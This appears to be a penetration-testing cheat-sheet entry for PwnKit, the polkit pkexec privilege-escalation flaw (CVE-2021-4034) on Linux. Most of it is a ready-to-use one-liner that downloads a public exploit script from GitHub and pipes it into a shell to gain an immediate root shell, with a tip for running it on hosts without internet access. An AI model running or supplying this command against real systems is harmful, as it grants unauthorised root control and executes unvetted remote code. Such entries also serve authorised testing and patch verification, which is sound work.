PwnKit Polkit Privesc (CVE-2021-4034)
privesclinuxtool
Summary
Exploit the polkit pkexec vulnerability (CVE-2021-4034) with the ly4k PwnKit one-liner to get an instant root shell on vulnerable Linux hosts.
Walkthrough
PwnKit exploits a memory-corruption flaw in polkit's pkexec (CVE-2021-4034) that affects most Linux distributions, granting an immediate root shell.
Steps
- Run the one-liner to fetch and execute PwnKit.sh; if the host is vulnerable it drops you into a root shell. (Download and run locally instead when the target has no internet access.)
Commands
bash
sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"